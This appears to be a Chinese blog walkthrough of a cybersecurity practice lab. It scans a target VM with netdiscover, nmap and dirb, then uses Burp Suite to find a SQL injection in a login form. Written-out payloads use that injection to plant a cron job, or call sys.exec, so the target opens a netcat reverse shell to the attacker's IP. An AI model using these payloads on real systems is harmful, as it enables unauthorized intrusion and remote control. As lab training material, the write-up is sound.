网络空间安全(羊)实战实例

扫描靶机

 netdiscover -r 靶机IP网段

在这里插入图片描述

nmap -sV 靶机IP

在这里插入图片描述

发现了80端口,可能存在网页

我们通过dirb对靶机进行隐藏网页进行探查

dirb http://靶机IP:端口

在这里插入图片描述

发现一个网页打开

在这里插入图片描述

需要用户名和密码

我们优先进行弱密码和判断是否存在注入点

启动burpsuite,修改设置

在这里插入图片描述

在这里插入图片描述

创建监听端口

在这里插入图片描述

进入burpsuite,修改监听端口或者创建add

在这里插入图片描述

开启监听

在这里插入图片描述

输入用户和密码,把数据导入到Repeater

在这里插入图片描述

判断是否存在注入点

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

发现密码处出现明显的改变,存在注入点。

当我们找到注入点,可以进行字符串猜解长度可以理解为是按照一列一列的查看密码的长度。

G9nLmNzZG4ubmV0L3dlaXhpbl80NTQ0MTcyNw==,size_16,color_FFFFFF,t_70)
在这里插入图片描述

‘order by 4#  报错
‘order by 3#页面正常

说明密码存在3个字节

设定定时任务反弹shell

union select “”,””,* * * * * root /usr/bin/nc.traditional kail的IP 监听端口 –c /bin/sh ” into outfile “/etc/cron.d/666”#
解析* * * * *分别对应 分 时 日 月 周 
这里利用的linux的系统定时任务

开启监听!!

一定要监听

nc -nlvp 监听端口等待一分钟后回弹。默认五个*是一分钟

在这里插入图片描述

在这里插入图片描述

直接连接

通过sys.exec命令来执行命令。

union select “”,””,”sys.exec(/usr/bin/nc.traditional  –c /bin/sh kail的IP  监听端口)”#

在这里插入图片描述

在这里插入图片描述

  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值